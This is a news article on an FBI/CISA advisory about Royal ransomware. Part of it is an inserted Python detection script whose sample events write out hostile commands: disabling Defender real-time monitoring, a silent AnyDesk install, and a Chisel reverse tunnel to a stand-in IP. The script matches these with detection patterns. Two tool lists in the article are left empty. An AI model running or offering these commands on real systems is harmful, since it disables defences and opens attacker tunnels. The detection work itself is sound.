Royal Ransomware Made Up to $11 Million


The collaborative efforts of the FBI and CISA have resulted in the creation and distribution of a comprehensive Cybersecurity Advisory (CSA) revealing that the threat actors behind the Royal ransomware made up to $11 million in cryptocurrency.

This advisory has been designed to share crucial information on the Royal ransomware threat and its associated IOCs and TTPs. 

The FBI’s dedicated threat response activities have identified these IOCs and TTPs recently in January 2023, and the CSA aims to share this information to help organizations protect themselves against this malicious threat.

A new variant of Royal ransomware has been used by cybercriminals to breach the security of both US-based and foreign organizations since around September 2022.


The FBI and CISA believe that the custom-built file encryption program utilized by a particular ransomware variant is an evolved version of previous iterations that employed a loader known as “Zeon.”

Action Flow

The modus operandi of the Royal ransomware involves disabling the antivirus software of targeted organizations after breaching their network security. 

As a result, considerable amounts of data are exfiltrated by attackers prior to the final deployment of the ransomware and encryption of the computers that are affected.

The operators of the Royal ransomware have demanded payment of a ransom in Bitcoin from their victims. These ransom demands have varied between roughly $1 million and $11 million USD, depending on the targeted organization’s size and level of sensitivity of the stolen data.

Based on recorded incidents, it has been observed that the perpetrators behind the Royal ransomware do not provide ransom amounts and payment details in their initial ransom notes. 

Instead, they engage in direct negotiations with the victims through a .onion URL after gaining their attention via the ransom note.

Critical Infrastructure Sectors Targeted

The Royal ransomware has specifically aimed at compromising a broad range of critical infrastructure sectors, which include:-

  • Manufacturing
  • Communications
  • Healthcare and Public Healthcare (HPH)
  • Education

Technical Analysis

Aside from the primary function of encrypting data, the individuals behind the Royal ransomware have also employed double extortion tactics.

The Royal ransomware operators employ multiple techniques to gain initial access to their target networks, which include:-

  • Phishing
  • Remote Desktop Protocol (RDP)
  • Public-facing applications
  • Initial access brokers

After successfully breaching a target network, the perpetrators establish communication with their C2 infrastructure. Subsequently, they download several tools to execute their attack strategy on the compromised systems.

The attackers have repurposed valid Windows software to their advantage in strengthening their foothold in the targeted network. They utilize this technique to evade detection by security protocols and to facilitate a further compromise of the victim’s network.

Recent observations have indicated that the perpetrators of the Royal ransomware have begun to use Chisel, as a means of communicating with their command and control (C2) infrastructure. 

The Royal ransomware operators have employed several command-and-control (C2) servers that have previously been linked to Qakbot malware in their attacks. However, it is not yet clear if the Royal ransomware exclusively relies on the Qakbot infrastructure for its operations.

To compromise the network further, the threat actors move laterally across it with the help of RDP or RMM tools like:-

  • AnyDesk
  • LogMeIn
  • Atera  

Afterward, they use pen-testing and malware tools in order to exfiltrate data from victim networks, such as:-

The Cobalt Strike program is subsequently repurposed for the purposes of aggregating and exfiltrating data.
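The post-compromise sequence described above (antivirus tampering, an RMM tool appearing where it is not expected, then a Chisel tunnel back to C2) is something a defender can look for in process-creation telemetry. The script below is an added example, not code from the advisory or from this article: it parses a small set of constructed process-creation events and flags each behaviour, then raises a "chain" flag when tampering is followed on the same host by an RMM tool or a tunnel. The binary names in RMM_BINARIES, the approved-host list, the log line shape and the command-line patterns are all assumptions made for the example.

```python
"""Illustrative detection pass over constructed process-creation events.

Flags the post-compromise behaviours described in the advisory summary:
antivirus tampering, remote-management (RMM) tools on unexpected hosts,
and Chisel-style tunnelling for C2. Tool names, hosts and command-line
shapes are assumptions for this example, not indicators from the advisory.
"""
import re
from collections import defaultdict

# Constructed sample telemetry (not real events). One event per line as
# key=value pairs; values containing spaces are double-quoted.
SAMPLE_EVENTS = """\
ts=2023-01-10T08:01:12 host=WS01 user=alice image=C:\\Windows\\System32\\svchost.exe cmdline="svchost.exe -k netsvcs"
ts=2023-01-10T08:03:40 host=WS01 user=alice image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe cmdline="powershell -nop -c Set-MpPreference -DisableRealtimeMonitoring $true"
ts=2023-01-10T08:05:02 host=WS01 user=alice image=C:\\Users\\alice\\AppData\\Local\\Temp\\AnyDesk.exe cmdline="AnyDesk.exe --install C:\\ProgramData\\AnyDesk --silent"
ts=2023-01-10T08:09:55 host=WS01 user=alice image=C:\\Users\\alice\\AppData\\Local\\Temp\\chisel.exe cmdline="chisel.exe client 203.0.113.10:8080 R:socks"
ts=2023-01-10T08:10:30 host=SRV02 user=svc_backup image="C:\\Program Files\\AnyDesk\\AnyDesk.exe" cmdline="AnyDesk.exe --service"
"""

# Assumed executable names for the RMM tools named in the article.
RMM_BINARIES = {"anydesk.exe", "logmein.exe", "ateraagent.exe"}
# Hosts where an RMM agent is expected (assumption: a real deployment would
# pull this from asset inventory rather than hard-code it).
APPROVED_RMM_HOSTS = {"SRV02"}
# Defender real-time protection being switched off via PowerShell.
AV_TAMPER = re.compile(r"set-mppreference.*-disablerealtimemonitoring", re.I)
# Chisel run in client mode (the side that dials out to the C2 server).
TUNNEL = re.compile(r"\bchisel(?:\.exe)?\s+client\b", re.I)

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Parse one key=value line into a dict; quoted values keep inner spaces."""
    fields = {}
    for key, value in KV_RE.findall(line):
        fields[key] = value[1:-1] if value.startswith('"') else value
    return fields


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of rule names a single event matches."""
    hits = []
    cmd = event.get("cmdline", "")
    image = basename(event.get("image", ""))
    if AV_TAMPER.search(cmd):
        hits.append("av_tamper")
    if image in RMM_BINARIES and event.get("host") not in APPROVED_RMM_HOSTS:
        hits.append("rmm_unexpected")
    if image == "chisel.exe" or TUNNEL.search(cmd):
        hits.append("c2_tunnel")
    return hits


def scan(log_text):
    """Scan raw events and return findings per host.

    Each host maps to its matched rules in time order plus a 'chain' flag
    set when antivirus tampering is later followed on that host by an RMM
    tool or a tunnel, i.e. the sequence the article describes.
    """
    per_host = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        for rule in classify(ev):
            per_host[ev["host"]].append((ev["ts"], rule))
    findings = {}
    for host, hits in per_host.items():
        hits.sort()  # ISO timestamps sort lexically
        rules = [rule for _, rule in hits]
        chain = False
        if "av_tamper" in rules:
            after = rules[rules.index("av_tamper") + 1:]
            chain = any(r in ("rmm_unexpected", "c2_tunnel") for r in after)
        findings[host] = {"rules": rules, "chain": chain}
    return findings


if __name__ == "__main__":
    for host, result in scan(SAMPLE_EVENTS).items():
        flag = " <-- tamper-then-tool chain" if result["chain"] else ""
        print(f"{host}: {', '.join(result['rules'])}{flag}")
```

Run stand-alone it reports WS01 with all three rules and the chain flag, and nothing for SRV02, where the RMM agent is on the approved list. The per-host correlation is the part worth keeping: any one of these signals on its own is noisy (administrators do install AnyDesk), but real-time protection going off shortly before a remote-access tool or a tunnel appears on the same machine is the pattern the advisory describes.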

During the month of January 2023, the Royal ransomware was reportedly associated with 19 attacks, placing it behind other ransomware families such as:- 

Recent reports indicate that Royal ransomware has advanced its capabilities and can now target both Windows and Linux environments. This suggests that the attackers are adapting and evolving their tactics to expand the scope of their attacks.

This expanded capability could lead to a wider range of targets for the attackers to compromise.
